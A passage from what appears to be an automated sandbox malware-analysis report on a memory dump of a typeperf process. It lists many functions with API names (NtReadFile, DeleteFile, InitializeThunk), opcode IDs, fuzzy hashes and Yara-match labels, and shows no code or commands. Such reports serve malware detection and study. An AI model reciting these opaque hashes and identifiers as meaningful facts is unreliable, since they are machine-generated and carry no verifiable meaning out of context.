                                                                                                                  • Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 7$.$/h$1$5^$5j$8$>$C3$R*$S$T$Ud$X$Yo$Z$\$_$`$d$e$j$loT$m$n$o@$oT$z$~$~
                                                                                                                  • API String ID: 0-2547687494
                                                                                                                  • Opcode ID: 5a73e224aa1e59a6b3cf36b0272761b8324c15898c1bb3030953faf41b8d5e14
                                                                                                                  • Instruction ID: d11f0187bd246f0847118d010564625fe3f3bf10f58f9839e6c5e284bc36b5d2
                                                                                                                  • Opcode Fuzzy Hash: 5a73e224aa1e59a6b3cf36b0272761b8324c15898c1bb3030953faf41b8d5e14
                                                                                                                  • Instruction Fuzzy Hash: 95329FB0D05229CBEB24CF44C9987DDBBB2BB85308F1085D9D5096B281D7B66EC8DF52
                                                                                                                  Function 005D90C0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 005D91A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738559852-0
                                                                                                                  • Opcode ID: 9d26a81417d4aad86a3bdfe432021ce06a5a1413c2db1edcf2b061ba22de14fe
                                                                                                                  • Instruction ID: 5e2fcd348419af09eb29d3ab2c432dd0ce616e0b4e72f3c0098229522538ce03
                                                                                                                  • Opcode Fuzzy Hash: 9d26a81417d4aad86a3bdfe432021ce06a5a1413c2db1edcf2b061ba22de14fe
                                                                                                                  • Instruction Fuzzy Hash: 1A31F8B5A00249AFDB14DF98C841EEFB7F9EF88304F10860AF918A7340D770A911CBA5
                                                                                                                  Function 005D91B0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4033686569-0
                                                                                                                  • Opcode ID: cae9c8f9a44f0116e701cd32b277d65933e45854969e26b53d9c359ffda555fc
                                                                                                                  • Instruction ID: b60f09b4d0564e4b8521792a6d5719248e1a5bb52ba56ffe61a73937ee56a111
                                                                                                                  • Opcode Fuzzy Hash: cae9c8f9a44f0116e701cd32b277d65933e45854969e26b53d9c359ffda555fc
                                                                                                                  • Instruction Fuzzy Hash: 84119171600605BED620EB68CC45FEFB7ACEFC9314F50450AF91897281D77179118BA5
                                                                                                                  Function 03174340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 24ad42fb7355fbb98f21aa88fda3809380a07b8cfb5f4cd7c62030472c2583fe
                                                                                                                  • Instruction ID: 2843a2f206b27ee3288c610a871e3ae6f62c86d57654307c3ff70ba79b69b774
                                                                                                                  • Opcode Fuzzy Hash: 24ad42fb7355fbb98f21aa88fda3809380a07b8cfb5f4cd7c62030472c2583fe
                                                                                                                  • Instruction Fuzzy Hash: 19900231605804139140B25849C4586400697E4301B95D011E0425558C8B148A565765
                                                                                                                  Function 03174650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 3f8723c5a79379a9e0c94251ab81fbea86305558b3bb20d22917614ca033253d
                                                                                                                  • Instruction ID: a814c513ebc8e15b660df8954e35f3bf8aa118457bdd202da19852d7fdaf781d
                                                                                                                  • Opcode Fuzzy Hash: 3f8723c5a79379a9e0c94251ab81fbea86305558b3bb20d22917614ca033253d
                                                                                                                  • Instruction Fuzzy Hash: A8900471701504434140F35C4D444477007D7F53013D5D115F0555574CC71CCD55D77D
                                                                                                                  Function 031735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 312dd022fafde603784f4c1b8b24aaf897b67fbeb57bb2c8ec62f4dd96ee6afb
                                                                                                                  • Instruction ID: 3f2e3322127b40667e86dd57f903944c991eff87cf0bbe452cd1680972d53015
                                                                                                                  • Opcode Fuzzy Hash: 312dd022fafde603784f4c1b8b24aaf897b67fbeb57bb2c8ec62f4dd96ee6afb
                                                                                                                  • Instruction Fuzzy Hash: B590023160550803D100B2584654746100687D4301FA5D411A042556CD87958A5169A6
                                                                                                                  Function 03172B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: d674fd4d7c218e0e334bd12d115238c3606a803392f0846dfc3979393b4fa059
                                                                                                                  • Instruction ID: 75acb95e11ec39715f878f1e43c15ee527e7b0a87199a0673d7cb0378bc1214d
                                                                                                                  • Opcode Fuzzy Hash: d674fd4d7c218e0e334bd12d115238c3606a803392f0846dfc3979393b4fa059
                                                                                                                  • Instruction Fuzzy Hash: D1900261202404034105B2584554656400B87E4301B95D021E1015594DC72589916529
                                                                                                                  Function 03172BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 900d543cb7f82b1b150f1c7cb37b6656eae25e934334139b1d734c0fc49801b5
                                                                                                                  • Instruction ID: 8a2d46a7028e914073a18995b59bab3b48caf53797f0cf6acedcd7823da70d2d
                                                                                                                  • Opcode Fuzzy Hash: 900d543cb7f82b1b150f1c7cb37b6656eae25e934334139b1d734c0fc49801b5
                                                                                                                  • Instruction Fuzzy Hash: A390023160540C03D150B2584554786000687D4301F95D011A0025658D87558B557AA5
                                                                                                                  Function 03172BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 7c4057369484e4de1f8f12cacae58db70f6f6c3ee960b2b0dc48a840c966d5a0
                                                                                                                  • Instruction ID: f966a18a9b4d118a44305fe7e98f0b150149f304e975bee7aa84a98016834f27
                                                                                                                  • Opcode Fuzzy Hash: 7c4057369484e4de1f8f12cacae58db70f6f6c3ee960b2b0dc48a840c966d5a0
                                                                                                                  • Instruction Fuzzy Hash: 3A90023120140C03D180B258454468A000687D5301FD5D015A0026658DCB158B597BA5
                                                                                                                  Function 03172BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 51682210cb305b6c406f3345b537fd3b7db5f38f8c85237363aefd66b7e599e3
                                                                                                                  • Instruction ID: 22fbf2272ad860c407ad87415b7fe98c93a195f569787cbd0b6a75eb7d1f720c
                                                                                                                  • Opcode Fuzzy Hash: 51682210cb305b6c406f3345b537fd3b7db5f38f8c85237363aefd66b7e599e3
                                                                                                                  • Instruction Fuzzy Hash: 2790023120544C43D140B2584544A86001687D4305F95D011A0065698D97258E55BA65
                                                                                                                  Function 03172AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 792451838e1cf94117a3484312ae5b87f2c7cc53888052c8d4d43603a3100053
                                                                                                                  • Instruction ID: c50fb5e4f2a364241434637cd08a22af322e1971c9ead9f9990e0315be771a17
                                                                                                                  • Opcode Fuzzy Hash: 792451838e1cf94117a3484312ae5b87f2c7cc53888052c8d4d43603a3100053
                                                                                                                  • Instruction Fuzzy Hash: 23900435311404030105F75C07445470047C7DD3513D5D031F1017554CD731CD715535
                                                                                                                  Function 03172AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 34b092d6bea5ba95e8feaaef6ba9b58fa43d52e83d1917b7dfb626e95a8a909b
                                                                                                                  • Instruction ID: 06ced77af00cf33740033a1a778df5749af3a3f9c46fdf0b984e672c6f91faf3
                                                                                                                  • Opcode Fuzzy Hash: 34b092d6bea5ba95e8feaaef6ba9b58fa43d52e83d1917b7dfb626e95a8a909b
                                                                                                                  • Instruction Fuzzy Hash: EC900225221404030145F658074454B044697DA3513D5D015F1417594CC72189655725
                                                                                                                  Function 031739B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: b24d058ab5906c04967d2143fdbdfa22a734111ba97eb3eb144186eaf81885f9
                                                                                                                  • Instruction ID: 58adfac8380c1fc0d21cd7130be18f3159453e4ddbe93a951efe0c43b592cbd4
                                                                                                                  • Opcode Fuzzy Hash: b24d058ab5906c04967d2143fdbdfa22a734111ba97eb3eb144186eaf81885f9
                                                                                                                  • Instruction Fuzzy Hash: 0590022124545503D150B25C45446564006A7E4301F95D021A0815598D875589556625
                                                                                                                  Function 03172F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 328d06d4a5794df2f81955634f004892fec64849502d97c8fa717023d23b4a74
                                                                                                                  • Instruction ID: ac14ebe779e06848e3294b198834cfa2483faf11a128593f40fdb565928934df
                                                                                                                  • Opcode Fuzzy Hash: 328d06d4a5794df2f81955634f004892fec64849502d97c8fa717023d23b4a74
                                                                                                                  • Instruction Fuzzy Hash: 4C90026134140843D100B2584554B460006C7E5301F95D015E1065558D8719CD52652A
                                                                                                                  Function 03172FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: e3199e7b693647bf03e02bd998568518826220270779e73ed9e58b62ba66e0bb
                                                                                                                  • Instruction ID: 5be25e599ea65834172b12cd25718938ae215fae8dd2874911200cc7b2cf4dba
                                                                                                                  • Opcode Fuzzy Hash: e3199e7b693647bf03e02bd998568518826220270779e73ed9e58b62ba66e0bb
                                                                                                                  • Instruction Fuzzy Hash: DD900221601404434140B26889849464006ABE5311795D121A0999554D875989655A69
                                                                                                                  Function 03172FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: a8f161b6fe2719e639f8bdcffd58be774ce4b1b9876025f92453c1285e48ecfa
                                                                                                                  • Instruction ID: 317124faf7c6bb66ac37dbaa8c0448393c48dd19682fd1ad9308c9b379c194d9
                                                                                                                  • Opcode Fuzzy Hash: a8f161b6fe2719e639f8bdcffd58be774ce4b1b9876025f92453c1285e48ecfa
                                                                                                                  • Instruction Fuzzy Hash: 76900221211C0443D200B6684D54B47000687D4303F95D115A0155558CCB1589615925
                                                                                                                  Function 03172E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 339efbcc9b33b5129d39cbea1fe63239abaad39cb055c11030e919f7a22fd794
                                                                                                                  • Instruction ID: 7d0862cb9eb7bcdf457c2561c44fc3560091dd64f13a2f0187523fc47f8ea87c
                                                                                                                  • Opcode Fuzzy Hash: 339efbcc9b33b5129d39cbea1fe63239abaad39cb055c11030e919f7a22fd794
                                                                                                                  • Instruction Fuzzy Hash: 5E90022160140903D101B2584544656000B87D4341FD5D022A1025559ECB258A92A535
                                                                                                                  Function 03172EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 72fd9ea41f458e50b48c5faf813552a67e4c3d27be5a84b121be2e3f19e260d8
                                                                                                                  • Instruction ID: bf46b24202cb8de510ba35fd9d9a0e8d9bee7f074528e675bcec39e4703959ae
                                                                                                                  • Opcode Fuzzy Hash: 72fd9ea41f458e50b48c5faf813552a67e4c3d27be5a84b121be2e3f19e260d8
                                                                                                                  • Instruction Fuzzy Hash: 0690026120180803D140B6584944647000687D4302F95D011A2065559E8B298D516539
                                                                                                                  Function 03172D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 77bdebb85332028e6eee891b6f9f62daac72f8fb9bafdb82007aad1dcbf4bd51
                                                                                                                  • Instruction ID: 891088f1456512b52e3f913de895b023e1139df5276c8238690c2d91b458f47e
                                                                                                                  • Opcode Fuzzy Hash: 77bdebb85332028e6eee891b6f9f62daac72f8fb9bafdb82007aad1dcbf4bd51
                                                                                                                  • Instruction Fuzzy Hash: 2390022921340403D180B258554864A000687D5302FD5E415A001655CCCB1589695725
                                                                                                                  Function 03172D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 2a51b51da322da2e14b288200154d258d754418313bd7453a9f6bf95ad18bf46
                                                                                                                  • Instruction ID: e7487840678c2fc6d0dcbd049a63646909ff69f64783dda83fe6741d83765150
                                                                                                                  • Opcode Fuzzy Hash: 2a51b51da322da2e14b288200154d258d754418313bd7453a9f6bf95ad18bf46
                                                                                                                  • Instruction Fuzzy Hash: D490022130140403D140B25855586464006D7E5301F95E011E0415558CDB1589565626
                                                                                                                  Function 03172DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 59127d61b1ddc033cc3019e63de0c80666f7077febf0b2001525a91ed12658a1
                                                                                                                  • Instruction ID: a14d6ab12e128f62756c256071bc98b4a2654ebca555effb60e48ec94d35d512
                                                                                                                  • Opcode Fuzzy Hash: 59127d61b1ddc033cc3019e63de0c80666f7077febf0b2001525a91ed12658a1
                                                                                                                  • Instruction Fuzzy Hash: F9900221242445535545F2584544547400797E43417D5D012A1415954C87269956DA25
                                                                                                                  Function 03172DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
